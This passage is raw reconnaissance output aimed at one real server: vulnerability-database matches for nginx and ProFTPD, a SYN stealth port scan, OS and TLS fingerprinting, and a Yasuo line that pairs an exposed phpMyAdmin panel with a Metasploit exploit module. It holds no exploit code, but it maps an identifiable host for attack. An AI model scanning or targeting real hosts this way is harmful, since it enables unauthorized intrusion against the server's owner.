6425| [CVE-2009-4487] nginx 0.7.64 writes data to a log file without sanitizing non-printable characters, which might allow remote attackers to modify a window's title, or possibly execute arbitrary commands or overwrite files, via an HTTP request containing an escape sequence for a terminal emulator.
6426| [CVE-2009-3898] Directory traversal vulnerability in src/http/modules/ngx_http_dav_module.c in nginx (aka Engine X) before 0.7.63, and 0.8.x before 0.8.17, allows remote authenticated users to create or overwrite arbitrary files via a .. (dot dot) in the Destination HTTP header for the WebDAV (1) COPY or (2) MOVE method.
6427| [CVE-2009-3896] src/http/ngx_http_parse.c in nginx (aka Engine X) 0.1.0 through 0.4.14, 0.5.x before 0.5.38, 0.6.x before 0.6.39, 0.7.x before 0.7.62, and 0.8.x before 0.8.14 allows remote attackers to cause a denial of service (NULL pointer dereference and worker process crash) via a long URI.
6428| [CVE-2009-2629] Buffer underflow in src/http/ngx_http_parse.c in nginx 0.1.0 through 0.5.37, 0.6.x before 0.6.39, 0.7.x before 0.7.62, and 0.8.x before 0.8.15 allows remote attackers to execute arbitrary code via crafted HTTP requests.
6429|
6430| SecurityFocus - https://www.securityfocus.com/bid/:
6431| [99534] Nginx CVE-2017-7529 Remote Integer Overflow Vulnerability
6432| [93903] Nginx CVE-2016-1247 Remote Privilege Escalation Vulnerability
6433| [91819] Nginx CVE-2016-1000105 Security Bypass Vulnerability
6434| [90967] nginx CVE-2016-4450 Denial of Service Vulnerability
6435| [82230] nginx Multiple Denial of Service Vulnerabilities
6436| [78928] Nginx CVE-2010-2266 Denial-Of-Service Vulnerability
6437| [70025] nginx CVE-2014-3616 SSL Session Fixation Vulnerability
6438| [69111] nginx SMTP Proxy Remote Command Injection Vulnerability
6439| [67507] nginx SPDY Implementation CVE-2014-0088 Arbitrary Code Execution Vulnerability
6440| [66537] nginx SPDY Implementation Heap Based Buffer Overflow Vulnerability
6441| [63814] nginx CVE-2013-4547 URI Processing Security Bypass Vulnerability
6442| [59824] Nginx CVE-2013-2070 Remote Security Vulnerability
6443| [59699] nginx 'ngx_http_parse.c' Stack Buffer Overflow Vulnerability
6444| [59496] nginx 'ngx_http_close_connection()' Remote Integer Overflow Vulnerability
6445| [59323] nginx NULL-Byte Arbitrary Code Execution Vulnerability
6446| [58105] Nginx 'access.log' Insecure File Permissions Vulnerability
6447| [57139] nginx CVE-2011-4968 Man in The Middle Vulnerability
6448| [55920] nginx CVE-2011-4963 Security Bypass Vulnerability
6449| [54331] Nginx Naxsi Module 'nx_extract.py' Script Remote File Disclosure Vulnerability
6450| [52999] nginx 'ngx_http_mp4_module.c' Buffer Overflow Vulnerability
6451| [52578] nginx 'ngx_cpystrn()' Information Disclosure Vulnerability
6452| [50710] nginx DNS Resolver Remote Heap Buffer Overflow Vulnerability
6453| [40760] nginx Remote Source Code Disclosure and Denial of Service Vulnerabilities
6454| [40434] nginx Space String Remote Source Code Disclosure Vulnerability
6455| [40420] nginx Directory Traversal Vulnerability
6456| [37711] nginx Terminal Escape Sequence in Logs Command Injection Vulnerability
6457| [36839] nginx 'ngx_http_process_request_headers()' Remote Buffer Overflow Vulnerability
6458| [36490] nginx WebDAV Multiple Directory Traversal Vulnerabilities
6459| [36438] nginx Proxy DNS Cache Domain Spoofing Vulnerability
6460| [36384] nginx HTTP Request Remote Buffer Overflow Vulnerability
6461|
6462| IBM X-Force - https://exchange.xforce.ibmcloud.com:
6463| [84623] Phusion Passenger gem for Ruby with nginx configuration insecure permissions
6464| [84172] nginx denial of service
6465| [84048] nginx buffer overflow
6466| [83923] nginx ngx_http_close_connection() integer overflow
6467| [83688] nginx null byte code execution
6468| [83103] Naxsi module for Nginx naxsi_unescape_uri() function security bypass
6469| [82319] nginx access.log information disclosure
6470| [80952] nginx SSL spoofing
6471| [77244] nginx and Microsoft Windows request security bypass
6472| [76778] Naxsi module for Nginx nx_extract.py directory traversal
6473| [74831] nginx ngx_http_mp4_module.c buffer overflow
6474| [74191] nginx ngx_cpystrn() information disclosure
6475| [74045] nginx header response information disclosure
6476| [71355] nginx ngx_resolver_copy() buffer overflow
6477| [59370] nginx characters denial of service
6478| [59369] nginx DATA source code disclosure
6479| [59047] nginx space source code disclosure
6480| [58966] nginx unspecified directory traversal
6481| [54025] nginx ngx_http_parse.c denial of service
6482| [53431] nginx WebDAV component directory traversal
6483| [53328] Nginx CRC-32 cached domain name spoofing
6484| [53250] Nginx ngx_http_parse_complex_uri() function code execution
6485|
6486| Exploit-DB - https://www.exploit-db.com:
6487| [26737] nginx 1.3.9/1.4.0 x86 Brute Force Remote Exploit
6488| [25775] Nginx HTTP Server 1.3.9-1.4.0 Chuncked Encoding Stack Buffer Overflow
6489| [25499] nginx 1.3.9-1.4.0 DoS PoC
6490| [24967] nginx 0.6.x Arbitrary Code Execution NullByte Injection
6491| [14830] nginx 0.6.38 - Heap Corruption Exploit
6492| [13822] Nginx <= 0.7.65 / 0.8.39 (dev) Source Disclosure / Download Vulnerability
6493| [13818] Nginx 0.8.36 Source Disclosure and DoS Vulnerabilities
6494| [12804] nginx [engine x] http server <= 0.6.36 Path Draversal
6495| [9901] nginx 0.7.0-0.7.61, 0.6.0-0.6.38, 0.5.0-0.5.37, 0.4.0-0.4.14 PoC
6496| [9829] nginx 0.7.61 WebDAV directory traversal
6497|
6498| OpenVAS (Nessus) - http://www.openvas.org:
6499| [864418] Fedora Update for nginx FEDORA-2012-3846
6500| [864310] Fedora Update for nginx FEDORA-2012-6238
6501| [864209] Fedora Update for nginx FEDORA-2012-6411
6502| [864204] Fedora Update for nginx FEDORA-2012-6371
6503| [864121] Fedora Update for nginx FEDORA-2012-4006
6504| [864115] Fedora Update for nginx FEDORA-2012-3991
6505| [864065] Fedora Update for nginx FEDORA-2011-16075
6506| [863654] Fedora Update for nginx FEDORA-2011-16110
6507| [861232] Fedora Update for nginx FEDORA-2007-1158
6508| [850180] SuSE Update for nginx openSUSE-SU-2012:0237-1 (nginx)
6509| [831680] Mandriva Update for nginx MDVSA-2012:043 (nginx)
6510| [802045] 64-bit Debian Linux Rootkit with nginx Doing iFrame Injection
6511| [801636] nginx HTTP Request Remote Buffer Overflow Vulnerability
6512| [103470] nginx 'ngx_http_mp4_module.c' Buffer Overflow Vulnerability
6513| [103469] nginx 'ngx_cpystrn()' Information Disclosure Vulnerability
6514| [103344] nginx DNS Resolver Remote Heap Buffer Overflow Vulnerability
6515| [100676] nginx Remote Source Code Disclosure and Denial of Service Vulnerabilities
6516| [100659] nginx Directory Traversal Vulnerability
6517| [100658] nginx Space String Remote Source Code Disclosure Vulnerability
6518| [100441] nginx Terminal Escape Sequence in Logs Command Injection Vulnerability
6519| [100321] nginx 'ngx_http_process_request_headers()' Remote Buffer Overflow Vulnerability
6520| [100277] nginx Proxy DNS Cache Domain Spoofing Vulnerability
6521| [100276] nginx HTTP Request Remote Buffer Overflow Vulnerability
6522| [100275] nginx WebDAV Multiple Directory Traversal Vulnerabilities
6523| [71574] Gentoo Security Advisory GLSA 201206-07 (nginx)
6524| [71308] Gentoo Security Advisory GLSA 201203-22 (nginx)
6525| [71297] FreeBSD Ports: nginx
6526| [71276] FreeBSD Ports: nginx
6527| [71239] Debian Security Advisory DSA 2434-1 (nginx)
6528| [66451] Fedora Core 11 FEDORA-2009-12782 (nginx)
6529| [66450] Fedora Core 10 FEDORA-2009-12775 (nginx)
6530| [66449] Fedora Core 12 FEDORA-2009-12750 (nginx)
6531| [64924] Gentoo Security Advisory GLSA 200909-18 (nginx)
6532| [64912] Fedora Core 10 FEDORA-2009-9652 (nginx)
6533| [64911] Fedora Core 11 FEDORA-2009-9630 (nginx)
6534| [64894] FreeBSD Ports: nginx
6535| [64869] Debian Security Advisory DSA 1884-1 (nginx)
6536|
6537| SecurityTracker - https://www.securitytracker.com:
6538| [1028544] nginx Bug Lets Remote Users Deny Service or Obtain Potentially Sensitive Information
6539| [1028519] nginx Stack Overflow Lets Remote Users Execute Arbitrary Code
6540| [1026924] nginx Buffer Overflow in ngx_http_mp4_module Lets Remote Users Execute Arbitrary Code
6541| [1026827] nginx HTTP Response Processing Lets Remote Users Obtain Portions of Memory Contents
6542|
6543| OSVDB - http://www.osvdb.org:
6544| [94864] cPnginx Plugin for cPanel nginx Configuration Manipulation Arbitrary File Access
6545| [93282] nginx proxy_pass Crafted Upstream Proxied Server Response Handling Worker Process Memory Disclosure
6546| [93037] nginx /http/ngx_http_parse.c Worker Process Crafted Request Handling Remote Overflow
6547| [92796] nginx ngx_http_close_connection Function Crafted r->
6548| [92634] nginx ngx_http_request.h zero_in_uri URL Null Byte Handling Remote Code Execution
6549| [90518] nginx Log Directory Permission Weakness Local Information Disclosure
6550| [88910] nginx Proxy Functionality SSL Certificate Validation MitM Spoofing Weakness
6551| [84339] nginx/Windows Multiple Request Sequence Parsing Arbitrary File Access
6552| [83617] Naxsi Module for Nginx naxsi-ui/ nx_extract.py Traversal Arbitrary File Access
6553| [81339] nginx ngx_http_mp4_module Module Atom MP4 File Handling Remote Overflow
6554| [80124] nginx HTTP Header Response Parsing Freed Memory Information Disclosure
6555| [77184] nginx ngx_resolver.c ngx_resolver_copy() Function DNS Response Parsing Remote Overflow
6556| [65531] nginx on Windows URI ::$DATA Append Arbitrary File Access
6557| [65530] nginx Encoded Traversal Sequence Memory Corruption Remote DoS
6558| [65294] nginx on Windows Encoded Space Request Remote Source Disclosure
6559| [63136] nginx on Windows 8.3 Filename Alias Request Access Rules / Authentication Bypass
6560| [62617] nginx Internal DNS Cache Poisoning Weakness
6561| [61779] nginx HTTP Request Escape Sequence Terminal Command Injection
6562| [59278] nginx src/http/ngx_http_parse.c ngx_http_process_request_headers() Function URL Handling NULL Dereference DoS
6563| [58328] nginx WebDAV Multiple Method Traversal Arbitrary File Write
6564| [58128] nginx ngx_http_parse_complex_uri() Function Underflow
6565| [44447] nginx (engine x) msie_refresh Directive Unspecified XSS
6566| [44446] nginx (engine x) ssl_verify_client Directive HTTP/0.9 Protocol Bypass
6567| [44445] nginx (engine x) ngx_http_realip_module satisfy_any Directive Unspecified Access Bypass
6568| [44444] nginx (engine x) X-Accel-Redirect Header Unspecified Traversal
6569| [44443] nginx (engine x) rtsig Method Signal Queue Overflow
6570| [44442] nginx (engine x) Worker Process Millisecond Timers Unspecified Overflow
6571|_
6572Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
6573Device type: general purpose
6574Running (JUST GUESSING): Linux 3.X|4.X (90%)
6575OS CPE: cpe:/o:linux:linux_kernel:3.10 cpe:/o:linux:linux_kernel:4.4
6576Aggressive OS guesses: Linux 3.10 (90%), Linux 3.10 - 3.12 (89%), Linux 4.4 (89%), Linux 4.9 (89%), Linux 3.10 - 3.16 (88%), Linux 4.0 (88%)
6577No exact OS matches for host (test conditions non-ideal).
6578Uptime guess: 13.972 days (since Mon Nov 11 11:38:19 2019)
6579Network Distance: 14 hops
6580TCP Sequence Prediction: Difficulty=256 (Good luck!)
6581IP ID Sequence Generation: All zeros
6582
6583TRACEROUTE (using port 443/tcp)
6584HOP RTT ADDRESS
65851 132.14 ms 10.245.200.1
65862 ...
65873 132.61 ms te0-0-2-1.nr11.b069785-0.tll01.atlas.cogentco.com (149.6.188.49)
65884 128.81 ms be2160.rcr51.tll01.atlas.cogentco.com (154.25.10.249)
65895 133.93 ms be3741.ccr22.sto03.atlas.cogentco.com (154.54.60.194)
65906 156.44 ms be2282.ccr42.ham01.atlas.cogentco.com (154.54.72.105)
65917 161.25 ms be2815.ccr41.ams03.atlas.cogentco.com (154.54.38.205)
65928 161.45 ms be2434.agr21.ams03.atlas.cogentco.com (130.117.2.241)
65939 169.87 ms tata.ams03.atlas.cogentco.com (130.117.15.102)
659410 170.85 ms if-ae-15-2.tcore1.pye-paris.as6453.net (195.219.194.146)
659511 168.54 ms te3-1.ew200-411-cr903.euroweb-network.com (80.231.154.50)
659612 175.57 ms 62.100.128.107
659713 177.12 ms 62.100.128.115
659814 178.57 ms vps2330-cloud.sd-france.net (92.39.247.11)
6599
6600NSE: Script Post-scanning.
6601Initiating NSE at 10:57
6602Completed NSE at 10:57, 0.00s elapsed
6603Initiating NSE at 10:57
6604Completed NSE at 10:57, 0.00s elapsed
6605#######################################################################################################################################
6606Version: 1.11.13-static
6607OpenSSL 1.0.2-chacha (1.0.2g-dev)
6608
6609Connected to 92.39.247.11
6610
6611Testing SSL server 92.39.247.11 on port 443 using SNI name 92.39.247.11
6612
6613 TLS Fallback SCSV:
6614Server supports TLS Fallback SCSV
6615
6616 TLS renegotiation:
6617Secure session renegotiation supported
6618
6619 TLS Compression:
6620Compression disabled
6621
6622 Heartbleed:
6623TLS 1.2 not vulnerable to heartbleed
6624TLS 1.1 not vulnerable to heartbleed
6625TLS 1.0 not vulnerable to heartbleed
6626
6627 Supported Server Cipher(s):
6628Preferred TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
6629Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
6630Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
6631Accepted TLSv1.2 256 bits AES256-GCM-SHA384
6632Accepted TLSv1.2 256 bits AES256-SHA256
6633Accepted TLSv1.2 256 bits AES256-SHA
6634Accepted TLSv1.2 256 bits CAMELLIA256-SHA
6635Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
6636Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
6637Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
6638Accepted TLSv1.2 128 bits AES128-GCM-SHA256
6639Accepted TLSv1.2 128 bits AES128-SHA256
6640Accepted TLSv1.2 128 bits AES128-SHA
6641Accepted TLSv1.2 128 bits CAMELLIA128-SHA
6642Preferred TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
6643Accepted TLSv1.1 256 bits AES256-SHA
6644Accepted TLSv1.1 256 bits CAMELLIA256-SHA
6645Accepted TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
6646Accepted TLSv1.1 128 bits AES128-SHA
6647Accepted TLSv1.1 128 bits CAMELLIA128-SHA
6648Preferred TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
6649Accepted TLSv1.0 256 bits AES256-SHA
6650Accepted TLSv1.0 256 bits CAMELLIA256-SHA
6651Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
6652Accepted TLSv1.0 128 bits AES128-SHA
6653Accepted TLSv1.0 128 bits CAMELLIA128-SHA
6654
6655 SSL Certificate:
6656Signature Algorithm: sha256WithRSAEncryption
6657RSA Key Strength: 2048
6658
6659Subject: Plesk
6660Issuer: Plesk
6661
6662Not valid before: Apr 1 15:36:51 2019 GMT
6663Not valid after: Mar 31 15:36:51 2020 GMT
6664#######################################################################################################################################
6665--------------------------------------------------------
6666<<<Yasuo discovered following vulnerable applications>>>
6667--------------------------------------------------------
6668+------------+---------------------------------------+--------------------------------------------------+----------+----------+
6669| App Name | URL to Application | Potential Exploit | Username | Password |
6670+------------+---------------------------------------+--------------------------------------------------+----------+----------+
6671| phpMyAdmin | https://92.39.247.11:8443/phpmyadmin/ | ./exploits/multi/http/phpmyadmin_preg_replace.rb | None | None |
6672+------------+---------------------------------------+--------------------------------------------------+----------+----------+
6673######################################################################################################################################
6674Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-25 11:02 EST
6675NSE: Loaded 47 scripts for scanning.
6676NSE: Script Pre-scanning.
6677Initiating NSE at 11:02
6678Completed NSE at 11:02, 0.00s elapsed
6679Initiating NSE at 11:02
6680Completed NSE at 11:02, 0.00s elapsed
6681Initiating Parallel DNS resolution of 1 host. at 11:02
6682Completed Parallel DNS resolution of 1 host. at 11:02, 0.03s elapsed
6683Initiating SYN Stealth Scan at 11:02
6684Scanning vps2330-cloud.sd-france.net (92.39.247.11) [65535 ports]
6685Discovered open port 53/tcp on 92.39.247.11
6686Discovered open port 22/tcp on 92.39.247.11
6687Discovered open port 443/tcp on 92.39.247.11
6688Discovered open port 995/tcp on 92.39.247.11
6689Discovered open port 110/tcp on 92.39.247.11
6690Discovered open port 21/tcp on 92.39.247.11
6691Discovered open port 80/tcp on 92.39.247.11
6692Discovered open port 143/tcp on 92.39.247.11
6693Discovered open port 993/tcp on 92.39.247.11
6694SYN Stealth Scan Timing: About 4.78% done; ETC: 11:13 (0:10:17 remaining)
6695SYN Stealth Scan Timing: About 5.75% done; ETC: 11:20 (0:16:39 remaining)
6696SYN Stealth Scan Timing: About 11.05% done; ETC: 11:16 (0:12:12 remaining)
6697SYN Stealth Scan Timing: About 15.54% done; ETC: 11:15 (0:10:58 remaining)
6698Discovered open port 4999/tcp on 92.39.247.11
6699SYN Stealth Scan Timing: About 17.01% done; ETC: 11:18 (0:13:00 remaining)
6700SYN Stealth Scan Timing: About 18.45% done; ETC: 11:19 (0:14:00 remaining)
6701SYN Stealth Scan Timing: About 23.20% done; ETC: 11:19 (0:13:08 remaining)
6702SYN Stealth Scan Timing: About 27.34% done; ETC: 11:18 (0:11:52 remaining)
6703SYN Stealth Scan Timing: About 31.62% done; ETC: 11:18 (0:10:57 remaining)
6704SYN Stealth Scan Timing: About 35.87% done; ETC: 11:18 (0:10:08 remaining)
6705SYN Stealth Scan Timing: About 40.72% done; ETC: 11:18 (0:09:21 remaining)
6706SYN Stealth Scan Timing: About 45.83% done; ETC: 11:17 (0:08:11 remaining)
6707Discovered open port 465/tcp on 92.39.247.11
6708SYN Stealth Scan Timing: About 50.62% done; ETC: 11:17 (0:07:14 remaining)
6709Increasing send delay for 92.39.247.11 from 0 to 5 due to max_successful_tryno increase to 4
6710SYN Stealth Scan Timing: About 46.83% done; ETC: 11:19 (0:08:59 remaining)
6711SYN Stealth Scan Timing: About 59.48% done; ETC: 11:22 (0:08:07 remaining)
6712SYN Stealth Scan Timing: About 66.59% done; ETC: 11:23 (0:07:05 remaining)
6713SYN Stealth Scan Timing: About 72.42% done; ETC: 11:24 (0:06:00 remaining)
6714SYN Stealth Scan Timing: About 77.86% done; ETC: 11:24 (0:04:55 remaining)
6715Discovered open port 8880/tcp on 92.39.247.11
6716Discovered open port 4900/tcp on 92.39.247.11
6717SYN Stealth Scan Timing: About 83.24% done; ETC: 11:25 (0:03:48 remaining)
6718Discovered open port 8443/tcp on 92.39.247.11
6719SYN Stealth Scan Timing: About 88.46% done; ETC: 11:25 (0:02:39 remaining)
6720Discovered open port 106/tcp on 92.39.247.11
6721SYN Stealth Scan Timing: About 93.68% done; ETC: 11:25 (0:01:28 remaining)
6722Completed SYN Stealth Scan at 11:26, 1415.97s elapsed (65535 total ports)
6723Initiating Service scan at 11:26
6724Scanning 15 services on vps2330-cloud.sd-france.net (92.39.247.11)
6725Completed Service scan at 11:28, 161.49s elapsed (15 services on 1 host)
6726Initiating OS detection (try #1) against vps2330-cloud.sd-france.net (92.39.247.11)
6727adjust_timeouts2: packet supposedly had rtt of -66183 microseconds. Ignoring time.
6728adjust_timeouts2: packet supposedly had rtt of -66183 microseconds. Ignoring time.
6729adjust_timeouts2: packet supposedly had rtt of -66350 microseconds. Ignoring time.
6730adjust_timeouts2: packet supposedly had rtt of -66350 microseconds. Ignoring time.
6731Retrying OS detection (try #2) against vps2330-cloud.sd-france.net (92.39.247.11)
6732Initiating Traceroute at 11:29
6733Completed Traceroute at 11:29, 3.00s elapsed
6734Initiating Parallel DNS resolution of 13 hosts. at 11:29
6735Completed Parallel DNS resolution of 13 hosts. at 11:29, 0.24s elapsed
6736NSE: Script scanning 92.39.247.11.
6737Initiating NSE at 11:29
6738Completed NSE at 11:29, 24.08s elapsed
6739Initiating NSE at 11:29
6740Completed NSE at 11:29, 1.60s elapsed
6741Nmap scan report for vps2330-cloud.sd-france.net (92.39.247.11)
6742Host is up (0.17s latency).
6743Not shown: 49126 filtered ports, 16394 closed ports
6744PORT STATE SERVICE VERSION
674521/tcp open ftp ProFTPD
6746| vulscan: VulDB - https://vuldb.com:
6747| [138380] ProFTPD 1.3.5b mod_copy Code Execution
6748| [81624] ProFTPD up to 1.3.5a/1.3.6rc1 mod_tls mod_tls.c weak encryption
6749| [75436] ProFTPD 1.3.4e/1.3.5 mod_copy File privilege escalation
6750| [10259] ProFTPD 1.3.4/1.3.5 mod_sftp/mod_sftp_pam kbdint.c resp_count denial of service
6751| [7244] ProFTPD up to 1.3.4 MKD/XMKD Command race condition
6752| [59589] ProFTPD up to 1.3.3 Use-After-Free memory corruption
6753| [4290] ProFTPD up to 1.3.3 mod_sftpd Big Payload denial of service
6754| [56304] ProFTPD up to 1.3.3 contrib/mod_sql.c) sql_prepare_where memory corruption
6755| [56042] GNU C Library up to 2.12.2 proftpd.gnu.c denial of service
6756| [56041] GNU C Library up to 2.12.2 proftpd.gnu.c denial of service
6757| [55410] ProFTPD 1.3.2/1.3.3 Telnet netio.c pr_netio_telnet_gets memory corruption
6758| [55403] ProFTPD 1.2.10/1.3.0/1.3.1/1.3.2/1.3.3 mod_site_misc Symlink directory traversal
6759| [55392] ProFTPD up to 1.3.2 pr_data_xfer denial of service
6760| [50631] ProFTPD 1.3.1/1.3.2/1.3.3 mod_tls unknown vulnerability
6761| [46500] ProFTPD 1.3.1 mod_sql_mysql sql injection
6762| [46499] ProFTPD 1.3.1/1.3.2/1.3.2 Rc2 mod_sql sql injection
6763| [44191] ProFTPD 1.3.1 FTP Command cross site request forgery
6764| [36309] ProFTPD 1.3.0 Rc1 mod_sql Plaintext unknown vulnerability
6765| [2747] ProFTPD 1.3.0/1.3.0a mod_ctrls pr_ctrls_recv_request memory corruption
6766| [33495] ProFTPD 1.3.0a Configuration File affected denial of service
6767| [2711] ProFTPD 1.3.0a mod_tls tls_x509_name_oneline memory corruption
6768| [2705] ProFTPD 1.3.0 main.c CommandBufferSize denial of service
6769|
6770| MITRE CVE - https://cve.mitre.org:
6771| [CVE-2012-6095] ProFTPD before 1.3.5rc1, when using the UserOwner directive, allows local users to modify the ownership of arbitrary files via a race condition and a symlink attack on the (1) MKD or (2) XMKD commands.
6772| [CVE-2011-4130] Use-after-free vulnerability in the Response API in ProFTPD before 1.3.3g allows remote authenticated users to execute arbitrary code via vectors involving an error that occurs after an FTP data transfer.
6773| [CVE-2011-1137] Integer overflow in the mod_sftp (aka SFTP) module in ProFTPD 1.3.3d and earlier allows remote attackers to cause a denial of service (memory consumption leading to OOM kill) via a malformed SSH message.
6774| [CVE-2010-4652] Heap-based buffer overflow in the sql_prepare_where function (contrib/mod_sql.c) in ProFTPD before 1.3.3d, when mod_sql is enabled, allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted username containing substitution tags, which are not properly handled during construction of an SQL query.
6775| [CVE-2010-4562] Microsoft Windows 2008, 7, Vista, 2003, 2000, and XP, when using IPv6, allows remote attackers to determine whether a host is sniffing the network by sending an ICMPv6 Echo Request to a multicast address and determining whether an Echo Reply is sent, as demonstrated by thcping. NOTE: due to a typo, some sources map CVE-2010-4562 to a ProFTPd mod_sql vulnerability, but that issue is covered by CVE-2010-4652.
6776| [CVE-2010-4221] Multiple stack-based buffer overflows in the pr_netio_telnet_gets function in netio.c in ProFTPD before 1.3.3c allow remote attackers to execute arbitrary code via vectors involving a TELNET IAC escape character to a (1) FTP or (2) FTPS server.
6777| [CVE-2010-4052] Stack consumption vulnerability in the regcomp implementation in the GNU C Library (aka glibc or libc6) through 2.11.3, and 2.12.x through 2.12.2, allows context-dependent attackers to cause a denial of service (resource exhaustion) via a regular expression containing adjacent repetition operators, as demonstrated by a {10,}{10,}{10,}{10,} sequence in the proftpd.gnu.c exploit for ProFTPD.
6778| [CVE-2010-4051] The regcomp implementation in the GNU C Library (aka glibc or libc6) through 2.11.3, and 2.12.x through 2.12.2, allows context-dependent attackers to cause a denial of service (application crash) via a regular expression containing adjacent bounded repetitions that bypass the intended RE_DUP_MAX limitation, as demonstrated by a {10,}{10,}{10,}{10,}{10,} sequence in the proftpd.gnu.c exploit for ProFTPD, related to a "RE_DUP_MAX overflow."
6779| [CVE-2010-3867] Multiple directory traversal vulnerabilities in the mod_site_misc module in ProFTPD before 1.3.3c allow remote authenticated users to create directories, delete directories, create symlinks, and modify file timestamps via directory traversal sequences in a (1) SITE MKDIR, (2) SITE RMDIR, (3) SITE SYMLINK, or (4) SITE UTIME command.
6780| [CVE-2009-3639] The mod_tls module in ProFTPD before 1.3.2b, and 1.3.3 before 1.3.3rc2, when the dNSNameRequired TLS option is enabled, does not properly handle a '\0' character in a domain name in the Subject Alternative Name field of an X.509 client certificate, which allows remote attackers to bypass intended client-hostname restrictions via a crafted certificate issued by a legitimate Certification Authority, a related issue to CVE-2009-2408.
6781| [CVE-2009-0919] XAMPP installs multiple packages with insecure default passwords, which makes it easier for remote attackers to obtain access via (1) the "lampp" default password for the "nobody" account within the included ProFTPD installation, (2) a blank default password for the "root" account within the included MySQL installation, (3) a blank default password for the "pma" account within the phpMyAdmin installation, and possibly other unspecified passwords. NOTE: this was originally reported as a problem in DFLabs PTK, but this issue affects any product that is installed within the XAMPP environment, and should not be viewed as a vulnerability within that product. NOTE: DFLabs states that PTK is intended for use in a laboratory with "no contact from / to internet."
6782| [CVE-2009-0543] ProFTPD Server 1.3.1, with NLS support enabled, allows remote attackers to bypass SQL injection protection mechanisms via invalid, encoded multibyte characters, which are not properly handled in (1) mod_sql_mysql and (2) mod_sql_postgres.
6783| [CVE-2009-0542] SQL injection vulnerability in ProFTPD Server 1.3.1 through 1.3.2rc2 allows remote attackers to execute arbitrary SQL commands via a "%" (percent) character in the username, which introduces a "'" (single quote) character during variable substitution by mod_sql.
6784| [CVE-2008-7265] The pr_data_xfer function in ProFTPD before 1.3.2rc3 allows remote authenticated users to cause a denial of service (CPU consumption) via an ABOR command during a data transfer.
6785| [CVE-2008-4242] ProFTPD 1.3.1 interprets long commands from an FTP client as multiple commands, which allows remote attackers to conduct cross-site request forgery (CSRF) attacks and execute arbitrary FTP commands via a long ftp:// URI that leverages an existing session from the FTP client implementation in a web browser.
6786| [CVE-2007-2165] The Auth API in ProFTPD before 20070417, when multiple simultaneous authentication modules are configured, does not require that the module that checks authentication is the same as the module that retrieves authentication data, which might allow remote attackers to bypass authentication, as demonstrated by use of SQLAuthTypes Plaintext in mod_sql, with data retrieved from /etc/passwd.
6787| [CVE-2006-6563] Stack-based buffer overflow in the pr_ctrls_recv_request function in ctrls.c in the mod_ctrls module in ProFTPD before 1.3.1rc1 allows local users to execute arbitrary code via a large reqarglen length value.
6788| [CVE-2006-6171] ** DISPUTED ** ProFTPD 1.3.0a and earlier does not properly set the buffer size limit when CommandBufferSize is specified in the configuration file, which leads to an off-by-two buffer underflow. NOTE: in November 2006, the role of CommandBufferSize was originally associated with CVE-2006-5815, but this was an error stemming from a vague initial disclosure. NOTE: ProFTPD developers dispute this issue, saying that the relevant memory location is overwritten by assignment before further use within the affected function, so this is not a vulnerability.
6789| [CVE-2006-6170] Buffer overflow in the tls_x509_name_oneline function in the mod_tls module, as used in ProFTPD 1.3.0a and earlier, and possibly other products, allows remote attackers to execute arbitrary code via a large data length argument, a different vulnerability than CVE-2006-5815.
6790| [CVE-2006-5815] Stack-based buffer overflow in the sreplace function in ProFTPD 1.3.0 and earlier allows remote attackers, probably authenticated, to cause a denial of service and execute arbitrary code, as demonstrated by vd_proftpd.pm, a "ProFTPD remote exploit."
6791| [CVE-2005-4816] Buffer overflow in mod_radius in ProFTPD before 1.3.0rc2 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long password.
6792| [CVE-2005-2390] Multiple format string vulnerabilities in ProFTPD before 1.3.0rc2 allow attackers to cause a denial of service or obtain sensitive information via (1) certain inputs to the shutdown message from ftpshut, or (2) the SQLShowInfo mod_sql directive.
6793| [CVE-2005-0484] Format string vulnerability in gprostats for GProFTPD before 8.1.9 may allow remote attackers to execute arbitrary code via an FTP transfer with a crafted filename that causes format string specifiers to be inserted into the ProFTPD transfer log.
6794| [CVE-2004-1602] ProFTPD 1.2.x, including 1.2.8 and 1.2.10, responds in a different amount of time when a given username exists, which allows remote attackers to identify valid usernames by timing the server response.
6795| [CVE-2004-0529] The modified suexec program in cPanel, when configured for mod_php and compiled for Apache 1.3.31 and earlier without mod_phpsuexec, allows local users to execute untrusted shared scripts and gain privileges, as demonstrated using untainted scripts such as (1) proftpdvhosts or (2) addalink.cgi, a different vulnerability than CVE-2004-0490.
6796| [CVE-2004-0432] ProFTPD 1.2.9 treats the Allow and Deny directives for CIDR based ACL entries as if they were AllowAll, which could allow FTP clients to bypass intended access restrictions.
6797| [CVE-2004-0346] Off-by-one buffer overflow in _xlate_ascii_write() in ProFTPD 1.2.7 through 1.2.9rc2p allows local users to gain privileges via a 1024 byte RETR command.
6798| [CVE-2003-0831] ProFTPD 1.2.7 through 1.2.9rc2 does not properly translate newline characters when transferring files in ASCII mode, which allows remote attackers to execute arbitrary code via a buffer overflow using certain files.
6799| [CVE-2003-0500] SQL injection vulnerability in the PostgreSQL authentication module (mod_sql_postgres) for ProFTPD before 1.2.9rc1 allows remote attackers to execute arbitrary SQL and gain privileges by bypassing authentication or stealing passwords via the USER name.
6800| [CVE-2001-1501] The glob functionality in ProFTPD 1.2.1, and possibly other versions allows remote attackers to cause a denial of service (CPU and memory consumption) via commands with large numbers of wildcard and other special characters, as demonstrated using an ls command with multiple (1) "*/..", (2) "*/.*", or (3) ".*./*?/" sequences in the argument.
6801| [CVE-2001-1500] ProFTPD 1.2.2rc2, and possibly other versions, does not properly verify reverse-resolved hostnames by performing forward resolution, which allows remote attackers to bypass ACLs or cause an incorrect client hostname to be logged.
